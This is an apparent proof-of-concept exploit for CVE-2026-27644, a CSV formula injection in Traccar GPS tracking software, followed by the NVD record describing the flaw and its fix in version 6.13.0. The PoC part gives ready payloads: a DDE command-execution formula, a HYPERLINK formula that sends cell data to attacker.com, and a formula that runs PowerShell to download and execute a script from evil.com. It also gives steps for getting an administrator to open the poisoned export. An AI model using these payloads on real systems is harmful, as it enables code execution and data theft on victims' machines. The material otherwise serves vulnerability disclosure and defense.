CVE-2026-27644

# Proof of Concept for CVE-2026-27644 (CSV Injection) # An attacker with low privileges can inject a formula into a device attribute. # Payload 1: Windows Command Execution (using DDE) payload_cmd = "=cmd|' /C calc'!A0" # Payload 2: Data Exfiltration (exfiltrating cell content to remote server) payload_exfil = "=HYPERLINK(\"http://attacker.com/steal?data=\"&A2,\"Click here\")" # Payload 3: PowerShell Execution payload_psh = "=MSEXCEL|'\\..\\..\\..\\..\\Windows\\System32\\cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString(\"http://evil.com/shell.ps1\")'!'!'" # Steps to reproduce: # 1. Login to Traccar as a regular user. # 2. Go to device settings and update the 'Unique ID' or a custom attribute to one of the payloads above. # 3. Ask an administrator to export the positions/reports to CSV. # 4. When the admin opens the CSV in Excel, the formula executes. print(f"Payload to inject: {payload_cmd}")

{"cve": {"id": "CVE-2026-27644", "sourceIdentifier": "[email protected]", "published": "2026-05-05T13:16:27.807", "lastModified": "2026-05-08T20:04:39.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Traccar is an open source GPS tracking system. In versions between 6.11.1 and 6.13.0, the CSV export functionality writes position data, including user-controlled device and computed attributes, to CSV output without proper escaping. An attacker can inject spreadsheet formulas through exported fields. When a manager or administrator opens the exported CSV file in spreadsheet software, this can cause formula execution and lead to command execution or data exfiltration. This has been patched in version 6.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.11.1", "versionEndExcluding": "6.13.0", "matchCriteriaId": "A453268E-69E6-4CE2-A341-8890520DF28E"}]}]}], "references": [{"url": "https://github.com/traccar/traccar/blob/v6.11.1/src/main/java/org/traccar/reports/CsvExportProvider.java#L89-L91", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/traccar/traccar/security/advisories/GHSA-745r-9qgj-x7m7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}, {"url": "https://github.com/traccar/traccar/security/advisories/GHSA-745r-9qgj-x7m7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}